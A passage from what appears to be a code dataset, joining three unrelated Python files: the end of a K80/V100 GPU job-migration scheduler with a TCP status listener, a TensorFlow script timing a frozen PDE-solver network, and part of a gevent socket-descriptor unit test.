promotion_list.remove('idle') # this includes force demotion
# lazy migration: for every V100 job slated for demotion (from high speedup to low), compare
# it with the K80 jobs slated for promotion (from low speedup to high); if their speedup
# difference is within 0.05, cancel that promotion/demotion pair.
for job_demote in sorted(pool_dict, key=pool_dict.get, reverse=True):
if job_demote in demotion_list:
for job_promote in sorted(pool_dict, key=pool_dict.get, reverse=False):
if job_promote in promotion_list:
if speedup_dict[job_promote] - speedup_dict[job_demote] < 0.05:
demotion_list.remove(job_demote)
promotion_list.remove(job_promote)
break
return promotion_list, demotion_list
def save_job(node, job): # save_job('c2176', '50')
# first wait for the job to be qualified for checkpointing
while True: # wait for ckpt_qual to be available
global ckpt_qual_dict
if ckpt_qual_dict['job'+job] == 1:
ckpt_qual_dict['job'+job] = 0
break
time.sleep(5)
global pid_dict
pid = pid_dict['job'+job]
send_signal(node, 'save ' + job + ' pid ' + pid) # 'save 50 pid 10000'
global ovhd_start
ovhd_start[job] = time.time()
time.sleep(3) # in case epoch_waste is communicated too frequently
def kill_job(node, job): # kill_job('c2176', '50')
send_signal(node, 'kill ' + job)
# resume job
def resume_job(node, gpu, job): # resume_job('c2176', '3', '50')
cmd = 'resume ' + job + ' gpu ' + gpu
send_signal(node, cmd)
# start job
def start_job(node, gpu, job):
cmd = 'start ' + job + ' gpu ' + gpu
send_signal(node, cmd)
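# Summary of the controller -> node command strings sent via send_signal:
#   'start <job> gpu <gpu>'    launch a job from scratch on the given GPU
#   'resume <job> gpu <gpu>'   resume a checkpointed job on the given GPU
#   'save <job> pid <pid>'     checkpoint a running job (its GPU is then treated as free)
#   'kill <job>'               terminate a job
#   'measure <job> gpu <gpu>'  profile the job (see measure_job below), presumably feeding gpu_pwr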
# function that checks the tensorboard log of currently running jobs and logs jobs that have finished the first epoch
# in a global list. Once it's done, it will be in a queue to be promoted to V100 for 3 more epochs.
def check_step1_complete(job_list):
log_path = '/scratch/li.baol/tsrbrd_log/job_runs/' + testcase + '/'
global step1_job
global V100_epoch_time
for job in job_list:
if job not in step1_job and job != 'idle':
log_dir = log_path + 'job' + job + '/*'
dirs = glob.glob(log_dir)
dirs.sort()
if len(dirs) > 0:
tc = dirs[0]
iterator = EventAccumulator(tc).Reload()
tag = 'loss'
try:
if len(iterator.Scalars(tag)) > 2: # this way we can collect one epoch time
wall_time = [t.wall_time for t in iterator.Scalars(tag)]
V100_epoch_time[job] = wall_time[1] - wall_time[0]
step1_job.append(job)
print('job' + job + ' has reached step1 complete')
except Exception:
pass
def check_step2_complete(job_list):
log_path = '/scratch/li.baol/tsrbrd_log/job_runs/' + testcase + '/'
global step1_job
global step2_job
global V100_epoch_time
global K80_epoch_time
global speedup_dict
for job in job_list:
if job in step1_job and job not in step2_job and job != 'idle':
log_dir = log_path + 'job' + job + '/*'
dirs = glob.glob(log_dir)
dirs.sort()
if len(dirs) > 1:
tc = dirs[1]
iterator = EventAccumulator(tc).Reload()
tag = 'loss'
try:
if len(iterator.Scalars(tag)) > 2: # this way we can collect one epoch time
wall_time = [t.wall_time for t in iterator.Scalars(tag)]
K80_epoch_time[job] = wall_time[1] - wall_time[0]
V100_time_step2 = V100_epoch_time[job]
K80_time_step2 = wall_time[1] - wall_time[0]
speedup = (K80_time_step2 - V100_time_step2) / K80_time_step2
speedup_dict[job] = speedup
step2_job.append(job)
print('job' + job + ' has reached step2 complete')
except Exception:
pass
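# Worked example of the speedup metric above: if one epoch takes 100s on a K80 and 30s on
# a V100, speedup = (100 - 30) / 100 = 0.7, i.e. the V100 saves 70% of the K80 epoch time.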
# measure job
def measure_job(node, gpu, job):
cmd = 'measure ' + job + ' gpu ' + gpu
send_signal(node, cmd)
############### first clear finish status of all jobs ####################
pid_dict = {'job' + str(i + 1): 0 for i in range(50)}
checkpoint_dict = {'job' + str(i + 1): 0 for i in range(50)}
ckpt_qual_dict = {'job' + str(i + 1): 0 for i in range(50)}
finish_dict = {'job' + str(i + 1): 0 for i in range(50)}
epoch_waste_dict = {'job' + str(i + 1): 0 for i in range(50)}
#################### background thread running TCP socket ########################
def thread_function():
# here listen on the socket
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_address = (host_node, 10002)
print('starting up on {} port {}'.format(*server_address))
sock.bind(server_address)
sock.listen(5)
while True:
# Wait for a connection
connection, client_address = sock.accept()
try:
while True:
data = connection.recv(32)
if data:
data_str = data.decode('utf-8')
global K80_start_time
global V100_start_time, promote_start_time
global K80_job
global V100_job
global K80_time
global V100_time
global ovhd_a, ovhd_b, ovhd_c, ovhd_d, k80_1st, v100_1st, ovhd_start, overhead, ovhd_total
global b_start, c_start, d_start, completion
if 'ckpt_qual' in data_str:
global ckpt_qual_dict
job_name = data_str.split(' ')[0]
ckpt_qual_dict[job_name] = 1
elif 'finish' in data_str:
global finish_dict
job_name = data_str.split(' ')[0]
job = job_name.replace('job','')
finish_dict[job_name] = 1
JCT[job] = int(time.time() - job_start[job])
if job in list(K80_job.values()):
K80_time[job] += int(time.time() - K80_start_time[job])
elif job in list(V100_job.values()):
V100_time[job] += int(time.time() - V100_start_time[job])
elif 'pid' in data_str:
global pid_dict
job_name = data_str.split(' ')[0]
pid = data_str.split(' ')[2]
pid_dict[job_name] = pid
elif 'checkpoint' in data_str: # can only be received after save signal is sent
global checkpoint_dict
job_name = data_str.split(' ')[0]
job = job_name.replace('job','')
checkpoint_dict[job_name] = 1
ovhd_a[job].append(int(time.time() - ovhd_start[job]))
b_start[job] = time.time()
elif 'waste' in data_str:
global epoch_waste_dict
job_name = data_str.split(' ')[0]
epoch_waste_time = data_str.split(' ')[2]
epoch_waste_dict[job_name] += int(epoch_waste_time)
elif 'b_end' in data_str:
job_name = data_str.split(' ')[0]
job = job_name.replace('job','')
ovhd_b[job].append(int(time.time() - b_start[job]))
c_start[job] = time.time()
elif 'c_end' in data_str:
job_name = data_str.split(' ')[0]
job = job_name.replace('job','')
ovhd_c[job].append(int(time.time() - c_start[job]))
d_start[job] = time.time()
elif 'd_end' in data_str:
job_name = data_str.split(' ')[0]
job = job_name.replace('job','')
ovhd_d[job].append(int(time.time() - d_start[job]))
ovhd_total[job].append(int(time.time() - ovhd_start[job]))
if ovhd_start[job] != 0:
overhead[job] += int(time.time() - ovhd_start[job])
ovhd_start[job] = 0
if job in list(K80_job.values()):
K80_start_time[job] = time.time()
elif job in list(V100_job.values()):
V100_start_time[job] = time.time()
promote_start_time[job] = time.time()
elif '1st_epoch' in data_str: # 'job50 1st_epoch 35'
job_name = data_str.split(' ')[0]
job = job_name.replace('job','')
epoch_time = int(data_str.split(' ')[2])
if job in list(K80_job.values()):
k80_1st[job].append(epoch_time)
elif job in list(V100_job.values()):
v100_1st[job].append(epoch_time)
elif 'completion' in data_str: # 'job50 completion 0.33'
job_name = data_str.split(' ')[0]
job = job_name.replace('job','')
completion_portion = float(data_str.split(' ')[2])
completion[job] = completion_portion
if 'ckpt_qual' in data_str or 'finish' in data_str or 'checkpoint' in data_str:
print('received ' + data_str)
connection.sendall(b'success')
#time.sleep(5)
else:
break
finally:
connection.close()
x = threading.Thread(target=thread_function, daemon=True)
x.start()
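# Messages the listener above understands (sent by the per-job wrappers / node daemons):
#   '<jobname> ckpt_qual', '<jobname> finish', '<jobname> pid <pid>', '<jobname> checkpoint',
#   epoch-waste reports ('... waste ... <seconds>'), '<jobname> b_end' / 'c_end' / 'd_end'
#   (checkpoint-overhead phase markers), '<jobname> 1st_epoch <seconds>', and
#   '<jobname> completion <fraction>'.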
###############################################################################
######################################################################
while True:
# termination condition:
# all the jobs have finished
################### check for finished jobs on K80 and V100 ##############################
for gpu, job in K80_job.items():
if job != 'idle':
if finish_dict['job'+job] == 1:
K80_used -= 1
K80_job[gpu] = 'idle'
print('K80 finished job: ' + job)
for gpu, job in V100_job.items():
if job != 'idle':
if finish_dict['job'+job] == 1:
V100_used -= 1
V100_job[gpu] = 'idle'
print('V100 finished job: ' + job)
if job in demote_list:
demote_list.remove(job)
################ check step1 finished job of K80 jobs and step 2 of V100 #################
check_step1_complete(list(V100_job.values()))
check_step2_complete(list(K80_job.values()))
for job in list(V100_job.values()):
if job not in qualified_job and job != 'idle':
if job in step1_job:
kill_job(V100_node, job)
qualified_job.append(job)
print('job' + job + ' has been qualified for demotion')
time.sleep(3) # wait for run.sh to finish
x1, x3 = gpu_pwr.process_csv('job'+job)
x2 = 3600 / V100_epoch_time[job]
speedup_pred = model.predict(np.array([x1, x2, x3]).reshape((1,-1)))[0] / 100
speedup_dict[job] = speedup_pred
predict_dict[job] = speedup_pred
############### record number of newly arrived jobs ################
new_arrival = 0
index_cpy = index
while True:
time_passed = int(time.time() - queue_timer)
if index_cpy >= len(queue):
break
elif time_passed >= queue_dict[queue[index_cpy]]:
new_arrival += 1
index_cpy += 1
elif time_passed < queue_dict[queue[index_cpy]]:
break
################ make promotion decisions ########################
V100_free = V100_cap - V100_used
K80_free = K80_cap - K80_used
if new_arrival == 0:
# this returns available jobs for promotion. Has to be qualified, and currently in K80, but not practically complete
promote_list = list(set(qualified_job).intersection(list(K80_job.values())).difference(pc_job))
else:
promote_list = []
# this returns job forced to be demoted. Currently in V100, and is practically complete
force_demote = list(set(list(V100_job.values())).intersection(pc_job))
# look at demote list
for gpu, job in V100_job.items():
if job != 'idle':
if job not in demote_list and job in step2_job and len(ovhd_total[job]) > 0:
job_speedup = speedup_dict[job] # 0.7
job_ovhd = np.mean(ovhd_total[job]) # 100
k80_1st_ovhd = np.mean(k80_1st[job]) - K80_epoch_time[job]
v100_1st_ovhd = np.mean(v100_1st[job]) - V100_epoch_time[job]
demote_qualify_time = (2 * job_ovhd + k80_1st_ovhd + v100_1st_ovhd) / job_speedup
if int(time.time() - promote_start_time[job]) > demote_qualify_time:
demote_list.append(job)
print('job' + job + ' qualified for demotion after passing the demote qualify time of ' +
str(int(demote_qualify_time)))
elif job not in demote_list and job not in step2_job and job in qualified_job:
demote_list.append(job)
print('job' + job + ' qualified for demotion for profiling')
if len(promote_list) > 0 or len(demote_list) > 0:
if new_arrival == 0:
promoted, demoted = max_speedup_promotion(K80_free, V100_free, V100_job, promote_list, demote_list, force_demote)
else:
promoted, demoted = min_speedup_demotion(K80_job, demote_list)
if len(demoted) - len(promoted) > new_arrival - V100_free:
# demote only # of new arrivals + # of promoted
print('some demotions canceled because there were more demotions than new arrivals + promotions, arrivals = ' +
str(new_arrival))
print('original demotion: ' + str(demoted))
demoted_pool = {}
for job in demoted:
if job in speedup_dict:
demoted_pool[job] = speedup_dict[job]
demoted = sorted(demoted_pool, key=demoted_pool.get, reverse=False)[:(len(promoted)+new_arrival-V100_free)]
print('new demotion: ' + str(demoted))
if len(promoted) > 0:
if new_arrival == 0:
print('no new job arrivals')
print('promoted jobs: ', promoted)
if len(demoted) > 0:
print('demoted jobs: ', demoted)
# stop all promoted jobs on K80
checkpoint_finish_check = []
for gpu, job in K80_job.items():
if job in promoted:
save_job(K80_node, job)
if finish_dict['job'+job] != 1:
K80_time[job] += int(time.time() - K80_start_time[job])
checkpoint_finish_check.append(job)
K80_job[gpu] = 'idle'
K80_used -= 1
# stop all demoted jobs on V100
for gpu, job in V100_job.items():
if job in demoted:
# make sure demoted step1 job doesn't get promoted back before finishing profiling
if job in step1_job and job not in step2_job:
speedup_dict[job] = 0.01
save_job(V100_node, job)
if finish_dict['job'+job] != 1:
V100_time[job] += int(time.time() - V100_start_time[job])
checkpoint_finish_check.append(job)
V100_job[gpu] = 'idle'
V100_used -= 1
demote_list.remove(job)
# wait for all GPUs to be available
if len(checkpoint_finish_check) > 0:
while True:
time.sleep(5)
for job in checkpoint_finish_check[:]:
if checkpoint_dict['job'+job] == 1: # checkpoint has finished, gpu is free
print(job + ' checkpointed successfully')
checkpoint_dict['job'+job] = 0 # reset it
checkpoint_finish_check.remove(job)
# also check if job already finished before sending checkpoint signal
elif finish_dict['job'+job] == 1:
print(job + ' finished before receiving checkpoint signal')
checkpoint_finish_check.remove(job)
if len(checkpoint_finish_check) == 0:
break
# resume promoted jobs on V100, make sure the gpu is idle
for job_new in promoted[:]:
if finish_dict['job'+job_new] != 1:
for gpu, job in V100_job.items():
if job == 'idle': # if gpu idle, schedule new job here
V100_job[gpu] = job_new
resume_job(V100_node, gpu, job_new)
num_mig[job_new] += 1
promoted.remove(job_new)
V100_used += 1
break
else: # job has already finished before checkpointing
promoted.remove(job_new)
# resume demoted jobs on K80, make sure the gpu is idle
for job_new in demoted[:]:
if finish_dict['job'+job_new] != 1:
for gpu, job in K80_job.items():
if job == 'idle': # if gpu idle, schedule new job here
resume_job(K80_node, gpu, job_new)
num_mig[job_new] += 1
K80_job[gpu] = job_new
demoted.remove(job_new)
K80_used += 1
break
else: # job has already finished before checkpointing
print('job'+job_new+' has finished before checkpointing')
demoted.remove(job_new)
# perform a check, make sure all promoted/demoted jobs are scheduled
if len(promoted) > 0 or len(demoted) > 0:
raise ValueError('Bug with promotion scheme, more jobs than free gpus')
################ submit new jobs to vacant V100 GPUs ############################
# check if there are vacant V100s
## yes: submit jobs from queue
## no: do nothing
if not all_jobs_started:
if V100_used < V100_cap:
V100_free = V100_cap - V100_used
for i in range(V100_free):
time_passed = int(time.time() - queue_timer)
if index < len(queue) and queue_dict[queue[index]] < time_passed: # make sure job has arrived in the queue
job_new = str(queue[index])
for gpu, job in V100_job.items():
if job == 'idle': # schedule new job here if idle
start_job(V100_node, gpu, job_new)
measure_job(V100_node, gpu, job_new)
V100_job[gpu] = job_new
job_start[job_new] = time.time()
V100_start_time[job_new] = time.time()
index += 1
V100_used += 1
time.sleep(5) # don't communicate too often
break
elif index >= len(queue):
all_jobs_started = True
############## monitor GPU usage ############
usage = K80_used + V100_used
time_stamp = int(time.time() - queue_timer)
gpu_usage_time.append(time_stamp)
gpu_usage.append(usage)
total_completion = np.sum(list(completion.values()))
gpu_usage_completion.append(total_completion)
############### wait for next iteration
time.sleep(INTERVAL)
################ check if termination condition is met ################
K80_idle_num = sum(value == 'idle' for value in K80_job.values())
V100_idle_num = sum(value == 'idle' for value in V100_job.values())
if K80_idle_num == K80_cap and V100_idle_num == V100_cap and index == len(queue):
print('all jobs are finished!')
break
# get average JCT
average_JCT = np.average(list(JCT.values()))
JCT['average'] = average_JCT
average_overhead = np.average(list(overhead.values()))
overhead['average'] = average_overhead
# after everything is finished
print('finished all runs')
JCT_name = testcase + '_JCT.json'
overhead_name = testcase + '_overhead.json'
num_mig_name = testcase + '_num_mig.json'
epoch_waste_name = testcase + '_epoch_waste.json'
ckpt_qual_name = 'ckpt_qual.json'
finish_name = 'finish.json'
K80_time_name = testcase + '_K80_time.json'
V100_time_name = testcase + '_V100_time.json'
gpu_usage_name = testcase + '_gpu_usage.csv'
ovhd_a_name = testcase + '_ovhd_a.json'
ovhd_b_name = testcase + '_ovhd_b.json'
ovhd_c_name = testcase + '_ovhd_c.json'
ovhd_d_name = testcase + '_ovhd_d.json'
ovhd_total_name = testcase + '_ovhd_total.json'
k80_1st_name = testcase + '_k80_1st.json'
v100_1st_name = testcase + '_v100_1st.json'
speedup_name = 'speedup.json'
predict_name = 'predict.json'
demote_list_name = 'demote_list.json'
completion_name = 'completion.json'
with open(JCT_name, 'w') as fp1:
json.dump(JCT, fp1, sort_keys=True, indent=4)
with open(overhead_name, 'w') as fp3:
json.dump(overhead, fp3, sort_keys=True, indent=4)
with open(num_mig_name, 'w') as fp3:
json.dump(num_mig, fp3, sort_keys=True, indent=4)
with open(epoch_waste_name, 'w') as fp3:
json.dump(epoch_waste_dict, fp3, sort_keys=True, indent=4)
with open(ckpt_qual_name, 'w') as fp1:
json.dump(ckpt_qual_dict, fp1, sort_keys=True, indent=4)
with open(finish_name, 'w') as fp1:
json.dump(finish_dict, fp1, sort_keys=True, indent=4)
with open(K80_time_name, 'w') as fp3:
json.dump(K80_time, fp3, sort_keys=True, indent=4)
with open(V100_time_name, 'w') as fp3:
json.dump(V100_time, fp3, sort_keys=True, indent=4)
with open(ovhd_a_name, 'w') as fp3:
json.dump(ovhd_a, fp3, sort_keys=True, indent=4)
with open(ovhd_b_name, 'w') as fp3:
json.dump(ovhd_b, fp3, sort_keys=True, indent=4)
with open(ovhd_c_name, 'w') as fp3:
json.dump(ovhd_c, fp3, sort_keys=True, indent=4)
with open(ovhd_d_name, 'w') as fp3:
json.dump(ovhd_d, fp3, sort_keys=True, indent=4)
with open(ovhd_total_name, 'w') as fp3:
json.dump(ovhd_total, fp3, sort_keys=True, indent=4)
with open(k80_1st_name, 'w') as fp3:
json.dump(k80_1st, fp3, sort_keys=True, indent=4)
with open(v100_1st_name, 'w') as fp3:
json.dump(v100_1st, fp3, sort_keys=True, indent=4)
with open(speedup_name, 'w') as fp1:
json.dump(speedup_dict, fp1, sort_keys=True, indent=4)
with open(predict_name, 'w') as fp1:
json.dump(predict_dict, fp1, sort_keys=True, indent=4)
with open(demote_list_name, 'w') as fp1:
json.dump(demote_list, fp1, sort_keys=True, indent=4)
with open(completion_name, 'w') as fp1:
json.dump(completion, fp1, sort_keys=True, indent=4)
gpu_usage_time = np.asarray(gpu_usage_time)
gpu_usage = np.asarray(gpu_usage)
gpu_usage_completion = np.asarray(gpu_usage_completion)
rows = zip(gpu_usage_time, gpu_usage, gpu_usage_completion)
with open(gpu_usage_name, 'w') as f:
writer = csv.writer(f)
for row in rows:
writer.writerow(row)
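# Columns of the <testcase>_gpu_usage.csv written above: elapsed seconds since the queue
# timer, number of GPUs in use (K80 + V100), and the summed completion fraction of all jobs.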
|
Time_Network.py
|
import argparse
import numpy as np
import tensorflow as tf
#from reader_frozen import plot_prediction, convert_time, read_data, read_mesh, read_soln
import os
import sys
import time
import multiprocessing
import threading
import csv
# Import flags specifying dataset parameters
from timer_flags import getFlags
DATA_COUNT = 10*20*50
#DATA_COUNT = 5000
increment = 1000
batch_size = 250
#batches = 4
MODEL_DIR = "/home/nick/Research/ConvPDE/Poisson_Circle/Model_1/"
SETUP_DIR = "./"
data_dir = "Data/"
mesh_dir = "Meshes/"
soln_dir = "Solutions/"
# Load graph from frozen .pb file
def load_graph(frozen_model_folder):
#frozen_graph_filename = frozen_model_folder + "frozen_model.pb"
frozen_graph_filename = frozen_model_folder + "optimized_frozen_model.pb"
with tf.gfile.GFile(frozen_graph_filename, "rb") as f:
graph_def = tf.GraphDef()
graph_def.ParseFromString(f.read())
with tf.Graph().as_default() as graph:
tf.import_graph_def(
graph_def,
input_map=None,
return_elements=None,
name="prefix",
producer_op_list=None
)
return graph
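# Note: the graph loading above uses the TensorFlow 1.x API (tf.gfile.GFile, tf.GraphDef,
# tf.Session); on TensorFlow 2.x the same calls are available under tf.compat.v1.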
## Neural Network
def network_times():
parser = argparse.ArgumentParser()
parser.add_argument("--model_dir", default=MODEL_DIR, type=str, help="Model folder to export")
parser.add_argument("--DATA_dir", default=SETUP_DIR, type=str, help="Folder containing dataset subdirectories")
parser.add_argument("--default_res", default=128, type=int, help="Resolution of data")
parser.add_argument("--ID", default=0, type=int, help="ID to plot")
parser.add_argument("--slice_plot", default=False, action="store_true", help="Plot a slice of the prediction/solution")
parser.add_argument("--show_error", default=False, action="store_true", help="Plot the error between the prediction and solution")
parser.add_argument("--use_hires", default=False, action="store_true", help="Option to use high resolution data")
parser.add_argument("--no_gpu", default=False, action="store_true", help="Specify if GPU is not being used")
parser.add_argument("--save_solutions", default=False, action="store_true", help="Option to save solutions to file")
parser.add_argument("--time_count", default=1, type=int, help="Time count for time tests")
args = parser.parse_args()
default_res = args.default_res
DATA_dir = args.DATA_dir
slice_plot = args.slice_plot
show_error = args.show_error
graph = load_graph(args.model_dir)
ID = args.ID
USE_HIRES = args.use_hires
NO_GPU = args.no_gpu
time_count = args.time_count
save_solutions = args.save_solutions
# Display operators defined in graph
#for op in graph.get_operations():
#print(op.name)
# Define input and output nodes
data = graph.get_tensor_by_name('prefix/data_test:0')
mesh = graph.get_tensor_by_name('prefix/mesh_test:0')
soln = graph.get_tensor_by_name('prefix/soln_test:0')
y_pred = graph.get_tensor_by_name('prefix/masked_pred_test:0')
y_scale = graph.get_tensor_by_name('prefix/masked_scale_test:0')
with tf.Session(graph=graph) as sess:
# Run initial session to remove graph loading time
"""
# Read mesh and data files
source = read_data(0, os.path.join(DATA_dir,data_dir), USE_HIRES=USE_HIRES)
data_batch = np.expand_dims(np.transpose(source, (1, 2, 0)),0)
mesh_data = read_mesh(0, os.path.join(DATA_dir,mesh_dir), USE_HIRES=USE_HIRES)
mesh_batch = np.expand_dims(np.transpose(mesh_data, (1, 2, 0)),0)
# Compute network prediction
y_out = sess.run(y_pred, feed_dict={
data: data_batch,
mesh: mesh_batch,
soln: data_batch
#soln: soln_batch
})
"""
batches = int(time_count*increment/batch_size)
#for count, batches in enumerate([int(n*increment/batch_size) for n in range(1,11)]):
for _ in range(0,1):
#count = 0
#batches = int(DATA_COUNT/batch_size)
# Start count at 1
#count += 1
#print("\n [ Loading Data ] \n")
#indices = np.array([n for n in range(0,DATA_COUNT)])
indices = np.array([n for n in range(0,int(time_count*increment))])
data_batches = []
mesh_batches = []
#soln_batches = []
start = time.perf_counter()
#mesh_array = np.load(mesh_dir + "Meshes.npy")
#data_array = np.load(data_dir + "Data.npy")
mesh_array = np.load(mesh_dir + "Meshes_0.npy")
data_array = np.load(data_dir + "Data_0.npy")
for n in range(1,time_count):
tmp_mesh_array = np.load(mesh_dir + "Meshes_" + str(n) + ".npy")
tmp_data_array = np.load(data_dir + "Data_" + str(n) + ".npy")
mesh_array = np.concatenate([mesh_array, tmp_mesh_array], axis=0)
data_array = np.concatenate([data_array, tmp_data_array], axis=0)
mesh_batches = np.split(mesh_array, batches, axis=0)
data_batches = np.split(data_array, batches, axis=0)
"""
def load_batch(n,dlist,mlist,tinds):
data_batch, mesh_batch = get_batch(n, batch_size, indices)
dlist.append(data_batch)
mlist.append(mesh_batch)
tinds.append(n)
remaining_batches = batches
step = 0
tinds = []
# Specify number of threads for loading data
THREADS = 8
while remaining_batches > 0:
sys.stdout.write(" Batch %d of %d\r" %(batches-remaining_batches+1, batches))
sys.stdout.flush()
THREADS = np.min([THREADS, remaining_batches])
threadList = []
for n in range(step,step+THREADS):
threadList.append(threading.Thread(target=load_batch, args=(n,data_batches,mesh_batches,tinds)))
for t in threadList:
t.start()
for t in threadList:
t.join()
step += THREADS
remaining_batches -= THREADS
sys.stdout.write(" Batch %d of %d\r" %(batches, batches))
sys.stdout.flush()
permute = np.argsort(np.array(tinds)).tolist()
data_batches = [data_batches[i] for i in permute]
mesh_batches = [mesh_batches[i] for i in permute]
#data_batches = np.reshape(np.array(data_batches)[permute], [-1,default_res,default_res,1])
#mesh_batches = np.reshape(np.array(mesh_batches)[permute], [-1,default_res,default_res,1])
"""
"""
for n in range(0,batches):
sys.stdout.write(" Batch %d of %d\r" %(n+1, batches))
sys.stdout.flush()
#data_batch, mesh_batch, soln_batch = get_batch(n, batch_size, indices)
data_batch, mesh_batch = get_batch(n, batch_size, indices)
data_batches.append(data_batch)
mesh_batches.append(mesh_batch)
#soln_batches.append(soln_batch)
"""
end = time.perf_counter()
load_time = end - start
#print("\n\nLoad Time: %.5f seconds" %(load_time))
#print("\n")
if NO_GPU:
print("\n [ Evaluating Network {:} ] \n".format(time_count))
else:
print("\n [ Evaluating Network (GPU) {:} ] \n".format(time_count))
start = time.perf_counter()
#for data_batch, mesh_batch, soln_batch in data:
for n in range(0, batches):
data_batch = data_batches[n]
mesh_batch = mesh_batches[n]
#soln_batch = soln_batches[n]
# SCALE INPUT DATA
scaling_factors = np.amax(np.abs(data_batch), axis=(1,2,3))[:,np.newaxis,np.newaxis,np.newaxis]
data_batch = data_batch/scaling_factors
sys.stdout.write(" Batch %d of %d\r" %(n+1, batches))
sys.stdout.flush()
# Compute network prediction
y_out, y_s = sess.run([y_pred, y_scale], feed_dict={
data: data_batch,
mesh: mesh_batch,
soln: data_batch
#soln: soln_batch
})
# RESCALE OUTPUT DATA
y_out = y_out * scaling_factors
if save_solutions:
batch_indices = [k for k in range(n*batch_size, (n+1)*batch_size)]
batch_IDs = indices[batch_indices]
for ID in batch_IDs:
filename = "./Solutions/network_solution_" + str(ID) + ".npy"
np.save(filename, y_out[ID - n*batch_size,:,:,0])
end = time.perf_counter()
## TIMES WITHOUT LOADING
#total_time = end - start
#batch_time = total_time / batches
#average_time = batch_time / batch_size
#print("\nTotal Time: %.5f seconds" %(total_time))
#print("\nBatch Time: %.5f seconds" %(batch_time))
#print("\nAverage Time: %.5f seconds" %(average_time))
## TIMES INCLUDING LOADING
ltotal_time = (end - start) + load_time
lbatch_time = ltotal_time / batches
laverage_time = lbatch_time / batch_size
#print("\n\n")
#print(" SOLVE TIMES:\n")
#print("\n - Total Time: %.5f seconds" %(ltotal_time))
#print(" - Batch Time: %.5f seconds" %(lbatch_time))
print(" ( Average Time: %.5f seconds )\n" %(laverage_time))
if NO_GPU:
filename = "Network_Times_NO_GPU.csv"
else:
filename = "Network_Times.csv"
## Remove pre-existing file
#if os.path.exists(filename):
# os.remove(filename)
with open(filename, 'a') as csvfile:
#csvfile.write("Total Time: %.5f\n" %(total_time))
#csvfile.write("Batch Time: %.5f\n" %(batch_time))
#csvfile.write("Average Time: %.5f\n" %(average_time))
#csvfile.write("\nWITH LOADING:")
#csvfile.write("Total Time: %.5f\n" %(ltotal_time))
#csvfile.write("Batch Time: %.5f\n" %(lbatch_time))
#csvfile.write("Average Time: %.5f\n" %(laverage_time))
csvfile.write("%d %.7f %.7f %.7f\n" %(int((time_count)*increment), ltotal_time, lbatch_time, laverage_time))
#csvfile.write("%d %.7f %.7f %.7f\n" %(DATA_COUNT, ltotal_time, lbatch_time, laverage_time))
# Evaluate network on specified input data and plot prediction
if __name__ == '__main__':
network_times()
|
test__makefile_ref.py
|
from __future__ import print_function
import os
from gevent import monkey; monkey.patch_all()
import re
import socket
import ssl
import threading
import unittest
import errno
dirname = os.path.dirname(os.path.abspath(__file__))
certfile = os.path.join(dirname, '2.7/keycert.pem')
pid = os.getpid()
import sys
PY3 = sys.version_info[0] >= 3
fd_types = int
if PY3:
long = int
fd_types = (int, long)
WIN = sys.platform.startswith("win")
from greentest import get_open_files
try:
import psutil
except ImportError:
psutil = None
class Test(unittest.TestCase):
extra_allowed_open_states = ()
def tearDown(self):
self.extra_allowed_open_states = ()
unittest.TestCase.tearDown(self)
def assert_raises_EBADF(self, func):
try:
result = func()
except (socket.error, OSError) as ex:
# Windows/Py3 raises "OSError: [WinError 10038]"
if ex.args[0] == errno.EBADF:
return
if WIN and ex.args[0] == 10038:
return
raise
raise AssertionError('NOT RAISED EBADF: %r() returned %r' % (func, result))
def assert_fd_open(self, fileno):
assert isinstance(fileno, fd_types)
open_files = get_open_files()
if fileno not in open_files:
raise AssertionError('%r is not open:\n%s' % (fileno, open_files['data']))
def assert_fd_closed(self, fileno):
assert isinstance(fileno, fd_types), repr(fileno)
assert fileno > 0, fileno
open_files = get_open_files()
if fileno in open_files:
raise AssertionError('%r is not closed:\n%s' % (fileno, open_files['data']))
def _assert_sock_open(self, sock):
# requires the psutil output
open_files = get_open_files()
sockname = sock.getsockname()
for x in open_files['data']:
if getattr(x, 'laddr', None) == sockname:
assert x.status in (psutil.CONN_LISTEN, psutil.CONN_ESTABLISHED) + self.extra_allowed_open_states, x.status
return
raise AssertionError("%r is not open:\n%s" % (sock, open_files['data']))
def assert_open(self, sock, *rest):
if isinstance(sock, fd_types):
if not WIN:
self.assert_fd_open(sock)
else:
fileno = sock.fileno()
assert isinstance(fileno, fd_types), fileno
sockname = sock.getsockname()
assert isinstance(sockname, tuple), sockname
if not WIN:
self.assert_fd_open(fileno)
else:
self._assert_sock_open(sock)
if rest:
self.assert_open(rest[0], *rest[1:])
def assert_closed(self, sock, *rest):
if isinstance(sock, fd_types):
self.assert_fd_closed(sock)
else:
# Under Python3, the socket module returns -1 for a fileno
# of a closed socket; under Py2 it raises
if PY3:
self.assertEqual(sock.fileno(), -1)
else:
self.assert_raises_EBADF(sock.fileno)
self.assert_raises_EBADF(sock.getsockname)
self.assert_raises_EBADF(sock.accept)
if rest:
self.assert_closed(rest[0], *rest[1:])
def make_open_socket(self):
s = socket.socket()
s.bind(('127.0.0.1', 0))
if WIN:
# Windows doesn't show as open until this
s.listen(1)
self.assert_open(s, s.fileno())
return s
class TestSocket(Test):
def test_simple_close(self):
s = self.make_open_socket()
fileno = s.fileno()
s.close()
self.assert_closed(s, fileno)
def test_makefile1(self):
s = self.make_open_socket()
fileno = s.fileno()
f = s.makefile()
self.assert_open(s, fileno)
s.close()
# Under Python 2, this closes the socket wrapper object but not the file descriptor;
# under Python 3, both stay open
if PY3:
self.assert_open(s, fileno)
else:
self.assert_closed(s)
self.assert_open(fileno)
f.close()
self.assert_closed(s)
self.assert_closed(fileno)
def test_makefile2(self):
s = self.make_open_socket()
fileno = s.fileno()
self.assert_open(s, fileno)
f = s.makefile()
self.assert_open(s)
self.assert_open(s, fileno)
f.close()
# closing fileobject does not close the socket
self.assert_open(s, fileno)
s.close()
self.assert_closed(s, fileno)
def test_server_simple(self):
listener = socket.socket()
listener.bind(('127.0.0.1', 0))
port = listener.getsockname()[1]
listener.listen(1)
connector = socket.socket()
def connect():
connector.connect(('127.0.0.1', port))
t = threading.Thread(target=connect)
t.start()
try:
client_socket, _addr = listener.accept()
fileno = client_socket.fileno()
self.assert_open(client_socket, fileno)
client_socket.close()
self.assert_closed(client_socket)
finally:
t.join()
listener.close()
def test_server_makefile1(self):
listener = socket.socket()
listener.bind(('127.0.0.1', 0))
port = listener.getsockname()[1]
listener.listen(1)
connector = socket.socket()
def connect():
connector.connect(('127.0.0.1', port))
t = threading.Thread(target=connect)
t.start()
try:
client_socket, _addr = listener.accept()
fileno = client_socket.fileno()
f = client_socket.makefile()
